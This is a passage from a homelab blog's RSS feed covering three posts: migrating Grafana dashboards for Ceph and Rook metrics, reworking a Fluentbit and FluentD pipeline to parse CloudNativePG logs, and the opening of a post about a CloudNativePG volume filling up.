</span></span></code></pre></div><p>This will enable the required MGR module and set up a Prometheus operator
ServiceMonitor. I initially had problems with actually getting Prometheus to
recognize the new ServiceMonitor, because I had not properly configured the
Namespaces where it looks for them. I fixed this by adding the following option
to the <code>prometheus.prometheusSpec</code> map in the <code>values.yaml</code> file for the
kube-prometheus-stack chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">serviceMonitorSelectorNilUsesHelmValues</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>By default, Prometheus only checks the Namespace where it is deployed. This
option configures it so it looks in all namespaces, unless you have explicitly
configured a list of Namespaces to check in the chart.</p>
<p>The next issue I observed, still on my old instance, was that the Ceph dashboard
I was using, a fork of <a href="https://grafana.com/grafana/dashboards/2842-ceph-cluster/">this dashboard</a>
was not handling multiple clusters well. This became an issue because I was now
gathering metrics from my baremetal and from my Rook cluster.</p>
<p>I worked around this by making use of Grafana&rsquo;s <a href="https://grafana.com/docs/grafana/latest/dashboards/variables/">Variables</a>.
I chose the <code>Custom</code> type of variable, and added the following two values:</p>
<pre tabindex="0"><code>job=&#34;ceph-metrics&#34;,job!=&#34;ceph-metrics&#34;
</code></pre><p>My old baremetal cluster&rsquo;s scrape job was called <code>ceph-metrics</code>, and the Ceph
metrics themselves sadly don&rsquo;t come with per-cluster labels.</p>
<p>Let&rsquo;s take a simple Stat panel showing the health of the cluster with this
query:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span> <span style="color:#66d9ef">without</span> <span style="color:#f92672">(</span>instance<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>ceph_health_status{<span style="color:#960050;background-color:#1e0010">${cluster</span>}<span style="color:#960050;background-color:#1e0010">}</span><span style="color:#f92672">)</span>
</span></span></code></pre></div><p>Now with my little workaround, the <code>${cluster}</code> variable will either contain
<code>job=&quot;ceph-metrics&quot;</code> or <code>job!=&quot;ceph-metrics&quot;</code>, cleanly separating the data for
my clusters.</p>
<p>One further change I had to make was to change the labels to be ignored in all
the aggregation queries specifically for the Rook cluster&rsquo;s data, because besides
the typical Ceph metrics, it also added the Pod name to some of them, for example
the <code>ceph_osd_op_r_out_bytes</code> metric. So for getting the current read rate for
my OSDs, I would then use this query:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span> <span style="color:#66d9ef">without</span> <span style="color:#f92672">(</span>ceph_daemon, instance, pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span><span style="color:#66d9ef">irate</span><span style="color:#f92672">(</span>ceph_osd_op_r_out_bytes{<span style="color:#960050;background-color:#1e0010">${cluster</span>}<span style="color:#960050;background-color:#1e0010">}</span>[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span>
</span></span></code></pre></div><p>The addition here was the <code>pod</code> in the <code>without</code> list.</p>
<p>With that bit of preface out of the way, let&rsquo;s look at the actual dashboard
migration. I opted to go for exporting the dashboard to a local file on my desktop
from the old Grafana and then importing it into the new Grafana.</p>
<p>To export a dashboard, you can use the &ldquo;Share&rdquo; button in the upper right of each
dashboard, next to the &ldquo;Save&rdquo; and &ldquo;Config&rdquo; buttons:</p>
<figure>
    <img loading="lazy" src="export-dashboard.png"
         alt="A screenshot of Grafana&#39;s dashboard export UI. It shows the top part of the dashboard UI in the background, with the button labeled &#39;Share&#39; marked in red. In the foreground is the dashboard share modal, with the &#39;Export&#39; tab selected. On this tab, the &#39;Export for sharing externally&#39; button is checked."/> <figcaption>
            <p>Grafana&rsquo;s dashboard export UI.</p>
        </figcaption>
</figure>

<p>When exporting dashboards for use in another Grafana instance, it is important
to check the &ldquo;Export for sharing externally&rdquo; button. With that, library panels
used in the dashboard are also exported as part of the dashboard.</p>
<p>After being stored in a file, the import is similarly simple. After loading the
JSON file previously exported via Grafana&rsquo;s dashboard import, which is shown as
an option when adding a new dashboard, your are presented with this form:
<figure>
    <img loading="lazy" src="import-dashboard.png"
         alt="A screenshot of Grafana&#39;s dashboard import UI. It contains the name of the dashboard, the unique identifier and dropdowns for choosing the folder to put the imported dashboard and selecting the Prometheus data source which should be used. In the lower part, it shows the heading &#39;Existing library panels&#39;, with two panels named &#39;Ceph Health Status&#39; and &#39;OSDs DOWN&#39;."/> <figcaption>
            <p>Grafana&rsquo;s dashboard import UI.</p>
        </figcaption>
</figure>
</p>
<p>The above import form allows you to set the name, the UID and the folder where
an imported dashboard is placed. Because I chose the &ldquo;Export for sharing externally&rdquo;
option, the import also contains two library panels I have in the dashboard.
Finally, you also get to chose the Prometheus data source to be used, as the
exported dashboard contains placeholders instead of actual IDs for the data
source.</p>
<p>This worked pretty well, including the import of the library panels, but I
still hit an error, specifically with those library panels. For some reason, the
data source placeholder was not properly replaced during the import, and I got
the following error message on the two library panels:</p>
<figure>
    <img loading="lazy" src="datasource-error.png"
         alt="A screenshot of Grafana&#39;s inspect panel, showing the &#39;Error&#39; tab. The error reads &#39;Datasource ${DS_PROMETHEUS-FOR-LIBRARY-PANEL} was not found.&#39;"/> <figcaption>
            <p>Error on imported library panels.</p>
        </figcaption>
</figure>

<p>I was not able to figure out why I was seeing this error. All of the non-library
panels in this dashboard, as well as all the other dashboards I imported, worked
fine, while all the library panels showed this same error.</p>
<p>I ended up fixing it by going to the &ldquo;JSON&rdquo; tab and manually replacing the
<code>${DS_PROMETHEUS-FOR-LIBRARY-PANEL}</code> placeholder with the name of my Prometheus
data source.</p>
<h2 id="conclusion">Conclusion</h2>
<p>This post finally concludes the migration of my metrics stack over to my Kubernetes
cluster. Besides that I now also have proper data gathering for the Kubernetes
and Rook clusters. More pretty graphs for me. &#x1f913;</p>
<p>This part of the migration took way longer than previous parts. I make my return
to gaming, and specifically returning to Stellaris, partially responsible for
that. &#x1f601;</p>
<p>The next step should hopefully go a bit faster: I will have a look at <a href="https://goharbor.io/">Harbor</a>
for both, my own image storage as well as using it as a pull-through cache.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Bite Sized: Some K8s Logging Changes</title>
      <link>https://blog.mei-home.net/posts/some-k8s-logging-changes/</link>
      <pubDate>Thu, 04 Apr 2024 00:17:53 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/some-k8s-logging-changes/</guid>
      <description>Because somehow, logging is complicated?</description>
      <content:encoded><![CDATA[<p>While working on the logging setup for my Grafana, Loki and CloudNativePG
deployments, I found that there were some things I disliked about my original k8s
logging setup, which I described <a href="https://blog.mei-home.net/posts/k8s-migration-6-logging/">here</a>.</p>
<p>This is the start of a kind of post where I try to keep the reading time reasonably
short.
Whenever I prefix a post with &ldquo;Bit Sized:&rdquo;, you can expect a short one. I&rsquo;m
trying to wean myself off of the incredibly long, meandering posts I seem to
keep putting out.</p>
<p><em>Hindsight:</em> Well, at least I stayed under 10 minutes.</p>
<h2 id="the-trigger-cloudnativepg-logs">The trigger: CloudNativePG logs</h2>
<p>I&rsquo;m running <a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">CloudNativePG</a>
for my database needs in the new k8s cluster. Configuring Grafana for my metrics
stack was the first time I deployed a production database with it. So obviously,
I needed to get the logs properly ingested. To see what we&rsquo;re dealing with,
here are the first couple of logs lines from the Postgres Pod in a CloudNativePG
deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29T10:15:37Z&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Starting workers&#34;</span>,<span style="color:#f92672">&#34;controller&#34;</span>:<span style="color:#e6db74">&#34;cluster&#34;</span>,<span style="color:#f92672">&#34;controllerGroup&#34;</span>:<span style="color:#e6db74">&#34;postgresql.cnpg.io&#34;</span>,<span style="color:#f92672">&#34;controllerKind&#34;</span>:<span style="color:#e6db74">&#34;Cluster&#34;</span>,<span style="color:#f92672">&#34;worker count&#34;</span>:<span style="color:#ae81ff">1</span>}
</span></span><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29T10:15:37Z&#34;</span>,<span style="color:#f92672">&#34;logger&#34;</span>:<span style="color:#e6db74">&#34;postgres&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29 10:15:37.836 UTC [23] LOG:  redirecting log output to logging collector process&#34;</span>,<span style="color:#f92672">&#34;pipe&#34;</span>:<span style="color:#e6db74">&#34;stderr&#34;</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;grafana-pg-cluster-1&#34;</span>}
</span></span><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29T10:15:37Z&#34;</span>,<span style="color:#f92672">&#34;logger&#34;</span>:<span style="color:#e6db74">&#34;postgres&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;record&#34;</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;grafana-pg-cluster-1&#34;</span>,<span style="color:#f92672">&#34;record&#34;</span>:{<span style="color:#f92672">&#34;log_time&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29 10:15:37.836 UTC&#34;</span>,<span style="color:#f92672">&#34;process_id&#34;</span>:<span style="color:#e6db74">&#34;23&#34;</span>,<span style="color:#f92672">&#34;session_id&#34;</span>:<span style="color:#e6db74">&#34;660694c9.17&#34;</span>,<span style="color:#f92672">&#34;session_line_num&#34;</span>:<span style="color:#e6db74">&#34;3&#34;</span>,<span style="color:#f92672">&#34;session_start_time&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29 10:15:37 UTC&#34;</span>,<span style="color:#f92672">&#34;transaction_id&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>,<span style="color:#f92672">&#34;error_severity&#34;</span>:<span style="color:#e6db74">&#34;LOG&#34;</span>,<span style="color:#f92672">&#34;sql_state_code&#34;</span>:<span style="color:#e6db74">&#34;00000&#34;</span>,<span style="color:#f92672">&#34;message&#34;</span>:<span style="color:#e6db74">&#34;listening on IPv4 address \&#34;0.0.0.0\&#34;, port 5432&#34;</span>,<span style="color:#f92672">&#34;backend_type&#34;</span>:<span style="color:#e6db74">&#34;postmaster&#34;</span>,<span style="color:#f92672">&#34;query_id&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>}}
</span></span></code></pre></div><p>All three are JSON, which is nice already, meaning I won&rsquo;t need any regexes.</p>
<p>The first line is the easiest to handle, produced by the management part of the
CloudNativePG Pod. The second is already a bit more complicated, because it
contains a full Postgres formatted logging message in it. From that line, I would
at least like to get the log level (<code>LOG</code> in this case) as well as the timestamp.</p>
<p>The third line is then the most complicated, because it contains the Postgres
log in the <code>record</code> key, now in JSON format as well.</p>
<p>But the above is not actually how those logs arrive in my FluentD instance.
First of all, because I use <a href="https://cri-o.io/">cri-o</a>, the first log line
would look like this in the actual log file:</p>
<pre tabindex="0"><code>2024-03-29T11:15:37.627916025+01:00 stderr F {&#34;level&#34;:&#34;info&#34;,&#34;ts&#34;:&#34;2024-03-29T10:15:37Z&#34;,&#34;msg&#34;:&#34;Starting workers&#34;,&#34;controller&#34;:&#34;cluster&#34;,&#34;controllerGroup&#34;:&#34;postgresql.cnpg.io&#34;,&#34;controllerKind&#34;:&#34;Cluster&#34;,&#34;worker count&#34;:1}
</code></pre><p>The prefix <code>&lt;time&gt; &lt;stream&gt; &lt;_p&gt; &lt;log&gt;</code> is added to each log
line a container produces by cri-o, and I think this might be a standardized format
mandated for CRI implementations?
To ingest these logs and send them on to FluentD, I&rsquo;m using Fluentbit, with its
<a href="https://docs.fluentbit.io/manual/pipeline/filters/kubernetes">Kubernetes plugin</a>.
My mistake here was to leave the option <code>Merge_Log</code> enabled. If the content of
<code>&lt;log&gt;</code> is a JSON string, the Kubernetes plugin takes that JSON object and adds
its keys to the record directly. This means by the time one of the logs lines
above arrives at my FluentD instance, it would look like this:</p>
<pre tabindex="0"><code>{[...]
 record=&#34;{\&#34;log_time\&#34;=&gt;\&#34;2024-03-29 22:55:27.814\&#34; [...]
}
</code></pre><p>This is not JSON format, instead it&rsquo;s nested keys format from FluentD. The issue
with this is that FluentD does not seem to have any good tools to do something
with an entire subkey. So I can&rsquo;t do something specific with the <code>record</code> key
here - I can only access specific subkeys, e.g. <code>record['record']['log_time']</code>,
at least as long as I don&rsquo;t want to go to Ruby. And I really, really don&rsquo;t want
to.</p>
<h2 id="time">Time!</h2>
<p>This lead me to another issue: While scrolling through some logs in my Grafana
dashboard, I saw that pretty much all of them were prefixed with a <code>time</code> key.
Which looks odd, because <code>time</code> should not appear in a log record&rsquo;s keys.
It turns out that that is the record key into which the CRI parser of Fluentbit
parses the <code>&lt;time&gt;</code> field from the cri-o log line! And because I generally don&rsquo;t
do anything with that key, preferring to use the timestamp from the actual
application log, I just left it in accidentally, polluting the log lines with
unnecessary information.</p>
<p>But, and here comes the real issue: I couldn&rsquo;t just change this behavior. The
cri-o multiline parser is embedded into Fluentbit, and not configurable. So
even though Fluentbit allows to configure whether parsers keep the time field
of the parsed log or not, it did not allow me to do so here.</p>
<p>Next possibility: Just drop the <code>time</code> key in Fluentbit, before even sending
the log on to FluentD. But this also wasn&rsquo;t possible, because of the <code>Merge_Log</code>
config of the Fluentbit Kubernetes plugin. This is due to some apps, e.g. Traefik
in my setup, producing JSON log lines and having a field called <code>time</code> in those
logs.
So consequently, when a Traefik log line runs through the Kubernetes plugin,
it will end up with its <code>time</code> field, not the original one from the cri-o parser,
being put at the apex level of the log record. Removing it would mean deleting
Traefik&rsquo;s own timestamp, which I did not want.</p>
<p>Instead of investigating further, I decided to switch <code>Merge_Log</code> off. This way,
Fluentbit never touches the actual log line produced by the app. It only parses
the CRI parts and slaps on some Kubernetes Pod labels, then sends the entire
enchilada on to FluentD for proper massaging.</p>
<p>This has the downside that now, I don&rsquo;t get &ldquo;parsed&rdquo; JSON logs for free,
but quite honestly, it isn&rsquo;t that much work to add something like this for the
apps which produce JSON formatted logs:</p>
<pre tabindex="0"><code>&lt;filter services.monitoring.grafana&gt;
    @type parser
    key_name log
    reserve_data true
    remove_key_name_field true
    &lt;parse&gt;
        @type json
        time_key t
        time_type string
        time_format %iso8601
        utc true
    &lt;/parse&gt;
&lt;/filter&gt;
</code></pre><p>This FluentD config only touches the <code>log</code> key of the incoming record, tries
to parse it as JSON, adding all JSON object keys to the record as keys and parses
the time from the <code>t</code> key, dropping that key afterwards.</p>
<p>I find this somehow more comforting, because I can be sure that I will always
find the app&rsquo;s original log output in the <code>log</code> key and can then do whatever
parsing I want in FluentD, leaving Fluentbit mostly as a log forwarder/shipper.</p>
<p>I still had to drop the <code>time</code> key from all incoming logs, but now I could be
sure that I was only removing the <code>&lt;time&gt;</code> part from the CRI log file entry,
keeping the actual app log&rsquo;s <code>time</code> key.</p>
<h2 id="parsing-cloudnativepg-logs">Parsing CloudNativePG logs</h2>
<p>Finally back to the CloudNativePG logs. The first step of the parsing process
is to parse the JSON log from the <code>log</code> key:</p>
<pre tabindex="0"><code>&lt;filter services.*.postgres&gt;
    @type parser
    key_name log
    reserve_data true
    remove_key_name_field true
    &lt;parse&gt;
        @type json
        time_key nil
    &lt;/parse&gt;
&lt;/filter&gt;
</code></pre><p>I&rsquo;m ignoring the time from that log, for now.</p>
<p>Then I have to broadly split the records into two categories. The logs coming
from the cnpg management plane, and the actual Postgres logs. That&rsquo;s done
as follows:</p>
<pre tabindex="0"><code>&lt;match services.*.postgres&gt;
  @type rewrite_tag_filter
  &lt;rule&gt;
    key record
    pattern /^.+$/
    tag pg-record.${tag}
    label @PGRECORD
  &lt;/rule&gt;
  &lt;rule&gt;
    key record
    pattern /^.+$/
    tag pg-no-record.${tag}
    invert true
    label @PGNORECORD
  &lt;/rule&gt;
&lt;/match&gt;
</code></pre><p>This checks whether the record (after parsing of <code>log</code>) has a <code>record</code> key,
and sends the records to different <a href="https://docs.fluentd.org/quickstart/life-of-a-fluentd-event#labels">labels</a>.</p>
<p>First comes the <code>PGRECORD</code> label, which handles log lines which look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29T10:15:37Z&#34;</span>,<span style="color:#f92672">&#34;logger&#34;</span>:<span style="color:#e6db74">&#34;postgres&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;record&#34;</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;grafana-pg-cluster-1&#34;</span>,<span style="color:#f92672">&#34;record&#34;</span>:{<span style="color:#f92672">&#34;log_time&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29 10:15:37.836 UTC&#34;</span>,<span style="color:#f92672">&#34;process_id&#34;</span>:<span style="color:#e6db74">&#34;23&#34;</span>,<span style="color:#f92672">&#34;session_id&#34;</span>:<span style="color:#e6db74">&#34;660694c9.17&#34;</span>,<span style="color:#f92672">&#34;session_line_num&#34;</span>:<span style="color:#e6db74">&#34;3&#34;</span>,<span style="color:#f92672">&#34;session_start_time&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29 10:15:37 UTC&#34;</span>,<span style="color:#f92672">&#34;transaction_id&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>,<span style="color:#f92672">&#34;error_severity&#34;</span>:<span style="color:#e6db74">&#34;LOG&#34;</span>,<span style="color:#f92672">&#34;sql_state_code&#34;</span>:<span style="color:#e6db74">&#34;00000&#34;</span>,<span style="color:#f92672">&#34;message&#34;</span>:<span style="color:#e6db74">&#34;listening on IPv4 address \&#34;0.0.0.0\&#34;, port 5432&#34;</span>,<span style="color:#f92672">&#34;backend_type&#34;</span>:<span style="color:#e6db74">&#34;postmaster&#34;</span>,<span style="color:#f92672">&#34;query_id&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>}}
</span></span></code></pre></div><p>They contain the JSON formatted Postgres log in the <code>record</code> key.</p>
<pre tabindex="0"><code>&lt;label @PGRECORD&gt;
  &lt;filter **&gt;
    @type record_transformer
    remove_keys record
    enable_ruby true
    &lt;record&gt;
      json_record ${record[&#34;record&#34;].to_json}
    &lt;/record&gt;
  &lt;/filter&gt;
  &lt;filter **&gt;
    @type parser
    key_name json_record
    reserve_data true
    remove_key_name_field true
    &lt;parse&gt;
      @type json
      time_key nil
    &lt;/parse&gt;
  &lt;/filter&gt;
  &lt;filter **&gt;
    @type record_transformer
    remove_keys log_time,message,error_severity
    &lt;record&gt;
      ts ${record[&#34;log_time&#34;]}
      level ${record[&#34;error_severity&#34;]}
      msg ${record[&#34;message&#34;]}
    &lt;/record&gt;
  &lt;/filter&gt;
  &lt;match pg-record.**&gt;
    @type relabel
    @label @PGNORECORD
  &lt;/match&gt;
&lt;/label&gt;
</code></pre><p>Okay, so one after the other. First, I need to transform the content of the
<code>record</code> key back into JSON - because in the initial parsing of the <code>log</code> key,
it would have been transformed into a FluentD nested key structure. Then I&rsquo;m
parsing that again. The effect that this has is that now, all the
keys from <code>log_record.record</code> are keys of the record itself, and the <code>record</code>
field has been removed.</p>
<p>Then I&rsquo;m rewriting the names of a couple of keys. I do this so they&rsquo;re
similar to the log lines produced by the cnpg management app. After the Postgres
log records pass through this pipeline, all the logs coming from the Postgres
Pod, regardless of whether they come from Postgres itself or the management plane
look approximately the same.</p>
<p>The unified logs are then further massaged by this pipeline:</p>
<pre tabindex="0"><code>&lt;label @PGNORECORD&gt;
  &lt;filter pg-no-record.**&gt;
    @type parser
    key_name msg
    reserve_data true
    remove_key_name_field false
    &lt;parse&gt;
      @type multi_format
      &lt;pattern&gt;
        format regexp
        expression /^(?&lt;ts&gt;[0-9\-]* [0-9\:\.]* [^\ ]+) [^\ ]* (?&lt;pglvl&gt;[^\ ]*) (?&lt;msg&gt;.*)$/
        time_key nil
      &lt;/pattern&gt;
      &lt;pattern&gt;
        format regexp
        expression /^(?&lt;msg&gt;.*)$/
        time_key nil
      &lt;/pattern&gt;
    &lt;/parse&gt;
  &lt;/filter&gt;
  &lt;filter **&gt;
    @type parser
    key_name ts
    reserve_data true
    remove_key_name_field true
    &lt;parse&gt;
      @type multi_format
      &lt;pattern&gt;
        format regexp
        expression /^(?&lt;logtime&gt;[0-9\-]* [0-9\:\.]* [^\ ]+)$/
        time_key logtime
        time_type string
        time_format %F %T.%N %Z
      &lt;/pattern&gt;
      &lt;pattern&gt;
        format regexp
        expression /^(?&lt;logtime&gt;[0-9]{4}-[01][0-8]-[0-3][0-9]T[0-2][0-9]:[0-6][0-9]:[0-6][0-9].*)$/
        time_key logtime
        time_type string
        time_format %iso8601
        utc true
      &lt;/pattern&gt;
    &lt;/parse&gt;
  &lt;/filter&gt;
  &lt;match **&gt;
    @type rewrite_tag_filter
    remove_tag_regexp /^pg-(no-)?record\./
    &lt;rule&gt;
      key msg
      pattern /^.+$/
      tag parsed.${tag}
      label @K8S
    &lt;/rule&gt;
  &lt;/match&gt;
&lt;/label&gt;
</code></pre><p>Again, going step by step. The first <code>filter</code> config takes the <code>msg</code> key
and parses it, with two potential regex parsers being tried. The first one
recognizes Postgres log lines in string format, like this one:</p>
<pre tabindex="0"><code>2024-03-29 10:15:37.836 UTC [23] LOG:  redirecting log output to logging collector process
</code></pre><p>It properly parses the timestamp and level, which are the two most important
parts for me. All other content of the <code>msg</code> key are left unparsed and are just
written back to the <code>msg</code> key as-is.</p>
<p>Finally, I&rsquo;m parsing the timestamp <code>ts</code>, which looks different now, depending on
whether the log line came from Postgres or from cnpg. For Postgres, the timestamp
looks like this: <code>2024-03-29 10:15:37.836 UTC</code>, while for cnpg it is a properly
formatted <a href="https://en.wikipedia.org/wiki/ISO_8601">ISO8601</a> date/time.</p>
<p>And finally I rewrite the tag to start with <code>parsed</code>, which indicates in my
config that the record should skip all the parsing pipelines.</p>
<h2 id="endless-loops---fluentbit-edition">Endless loops - Fluentbit edition</h2>
<p>Before ending for today, one thing needs an honorary mention: I build another
endless loop! &#x1f389;</p>
<p>This time, just by enabling Fluentbit&rsquo;s debug log verbosity. Because then, it
produces a log entry for every message forwarded to FluentD - including its own:</p>
<pre tabindex="0"><code>component=output:forward:forward.0 msg=&#34;send options records=0 chunk=&#39;&#39;
</code></pre><p>The one advantage about having my rack right next to my desk: I heard the fans
crank the RPMs right away. &#x1f605;</p>
<p>Now you know why I was talking about Eldritch Horrors and the log pipeline being
the most complicated part of my Homelab. I actually planned to just tidy up the
monitoring stack migration a bit over the long Easter weekend and write the blog
post, so I could get started with the next k8s migration step this
week. Instead this is what I decided to spend my long weekend on. &#x1f926;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 8a: CloudNativePG Disk Size Problems</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-8a-pg-problems/</link>
      <pubDate>Fri, 29 Mar 2024 16:22:04 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-8a-pg-problems/</guid>
      <description>Unhelpful error messages with a side of user error</description>
      <content:encoded><![CDATA[<p>I recently started migrating my <a href="https://grafana.com/">Grafana</a> instance from
Nomad to k8s and hit some very weird errors in the CloudNativePG DB after letting
it run for a short while.</p>
<p>This is an addendum to my <a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">previous post</a>
on <a href="https://cloudnative-pg.io/">CloudNativePG</a>.</p>
<h2 id="the-initial-issue">The initial issue</h2>
<p>The first issue came during the first setup of Grafana. A couple of minutes
after Grafana started running and writing data to the DB, the two database pods (primary and replica)
suddenly stopped working and just threw this error:</p>
<pre tabindex="0"><code>msg=&#34;DB not available, will retry&#34;
err=&#34;failed to connect to `host=/controller/run user=postgres database=postgres`: dial error (dial unix /controller/run/.s.PGSQL.5432: connect: no such file or directory)&#34;
</code></pre><p>Initially, I thought I had somehow screwed up my NetworkPolicy setup. But after
re-creating the CloudNativePG Cluster CR, it all worked again. I thought it was
a hiccup and returned to working on Grafana, but a couple of minutes into the
next Grafana deployment, the same issue happened again. And then again, after
another deletion and re-creation of the Cluster CR. The error was always the same.</p>
<p>What saved me in the end was a random look at my metrics dashboard, where I&rsquo;m
showing the following plot:</p>
<figure>
    <img loading="lazy" src="disk_full.png"
         alt="A screenshot of a gauge style Grafana panel. It shows the CSI volume utilization of the grafana-pg-cluster-1 storage volume. At 97.9%."/> <figcaption>
            <p>Yupp, it&rsquo;s full.</p>
        </figcaption>
</figure>

<p>So there I had it. I had simply made the volume for the Postgres DB storage too
small. Way too small, as it turns out. My Cluster manifest looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">grafana-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:16.2-10&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;20&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;25MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;75MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;6400kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;768kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;640kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;128MB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">256MB</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span></code></pre></div><p>While creating this config, I had looked at the size of the Grafana DB on my
